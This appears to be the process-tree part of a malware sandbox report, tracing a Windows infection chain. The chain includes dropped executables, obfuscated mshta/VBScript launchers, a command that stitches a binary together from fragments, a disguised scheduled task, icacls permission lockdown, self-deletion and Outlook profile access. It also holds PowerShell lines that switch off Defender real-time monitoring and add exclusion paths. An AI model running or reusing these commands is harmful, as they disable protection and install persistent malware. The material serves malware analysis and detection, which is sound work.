C:\Users\Admin\AppData\Local\Temp\NIKE.exe"C:\Users\Admin\AppData\Local\Temp\NIKE.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\136.exe"C:\Users\Admin\AppData\Local\Temp\136.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\A2E0.exeC:\Users\Admin\AppData\Local\Temp\A2E0.exe2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"3⤵
- Suspicious behavior: AddClipboardFormatListener
-
C:\Users\Admin\AppData\Local\Temp\E757.exeC:\Users\Admin\AppData\Local\Temp\E757.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\E757.exeC:\Users\Admin\AppData\Local\Temp\E757.exe3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\E757.exe"C:\Users\Admin\AppData\Local\Temp\E757.exe" --Admin IsNotAutoStart IsNotTask4⤵
-
C:\Users\Admin\AppData\Local\Temp\E757.exe"C:\Users\Admin\AppData\Local\Temp\E757.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Modifies extensions of user files
-
C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe"C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe"C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe"7⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build2.exe" & del C:\ProgramData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build3.exe"C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build3.exe"C:\Users\Admin\AppData\Local\34513e6f-3c25-496a-abb8-bea9ecea0c1c\build3.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\F468.exeC:\Users\Admin\AppData\Local\Temp\F468.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\FB7E.exeC:\Users\Admin\AppData\Local\Temp\FB7E.exe2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipT: CLOSe ( CReATeobjeCT ("wsCriPt.shELL" ). rUN ( "CmD.Exe /q /c TYpe ""C:\Users\Admin\AppData\Local\Temp\FB7E.exe"" >..\EQPEwF~GHJ5D.eXE && sTArT ..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq &If """" =="""" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\FB7E.exe"" ) do taskkill /f -IM ""%~nXK"" " , 0 , TRue ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\Admin\AppData\Local\Temp\FB7E.exe" >..\EQPEwF~GHJ5D.eXE && sTArT ..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq &If "" =="" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\FB7E.exe" ) do taskkill /f -IM "%~nXK"4⤵
-
C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRipT: CLOSe ( CReATeobjeCT ("wsCriPt.shELL" ). rUN ( "CmD.Exe /q /c TYpe ""C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE"" >..\EQPEwF~GHJ5D.eXE && sTArT ..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq &If ""/pZ5QGjTyt68Asb0yBdT2u86meJWIOq "" =="""" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE"" ) do taskkill /f -IM ""%~nXK"" " , 0 , TRue ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c TYpe "C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE" >..\EQPEwF~GHJ5D.eXE && sTArT ..\EQpEWF~GHj5D.EXe /pZ5QGjTyt68Asb0yBdT2u86meJWIOq &If "/pZ5QGjTyt68Asb0yBdT2u86meJWIOq " =="" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\EQPEwF~GHJ5D.eXE" ) do taskkill /f -IM "%~nXK"7⤵
- Blocklisted process makes network request
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT:CloSE ( CrEAtEObjEcT ("WScrIpt.SheLL" ). RUn ( "cmd /Q /C ecHO | sET /p = ""MZ"" > uYWtD.N & COpy /B /Y uYwTd.N+ WTWIUAL0.Kci + KNhwd.RL +ZYKB.3YA +QIKkd6u.7NY + T5IJ2.6Z + L8YYF.2W ..\x3l5OyC.C& Del /q *& sTArt msiexec.exe /Y ..\x3L5OyC.C " , 0 , TRUe ) )6⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C ecHO | sET /p = "MZ" > uYWtD.N & COpy /B /Y uYwTd.N+ WTWIUAL0.Kci + KNhwd.RL +ZYKB.3YA +QIKkd6u.7NY + T5IJ2.6Z + L8YYF.2W ..\x3l5OyC.C& Del /q *& sTArt msiexec.exe /Y ..\x3L5OyC.C7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>uYWtD.N"8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\x3L5OyC.C8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -IM "FB7E.exe"5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\552.exeC:\Users\Admin\AppData\Local\Temp\552.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\CD5.exeC:\Users\Admin\AppData\Local\Temp\CD5.exe2⤵
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im CD5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CD5.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im CD5.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS4185F825\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4185F825\setup_install.exe"4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14514904a4b.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe5⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\54a78f3534054e4094b5dcc8bfa8fe17 /t 7532 /p 14841⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\268664f747d1418988c88ecd44fa4698 /t 9716 /p 94201⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 6876689D2F1664046433D64C4AADC227 C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AC68B23265445E6FB00590B6FA68998A C2⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3AD283306D8C3C90D173224BD6B7F2752⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--loGQqfG2tg"4⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x234,0x238,0x23c,0x230,0x240,0x7ffb7845dec0,0x7ffb7845ded0,0x7ffb7845dee05⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=2316 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2576 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2568 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=1772 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1724 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=3128 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3168 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=3360 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=3380 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=2184 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=2192 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1716,6038065555358806122,18416253620990546324,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8952_1881555973" --mojo-platform-channel-handle=1852 /prefetch:85⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_BB94.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DB7EC0B51976DC47F317AD599C06B9E82⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 19F7D6E831BF19A4C95537D0EFB746CD E Global\MSI00002⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\1f0e62ce01534bbf9891dab1858bfd74 /t 9096 /p 98281⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10368 -s 6323⤵
- Program crash
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
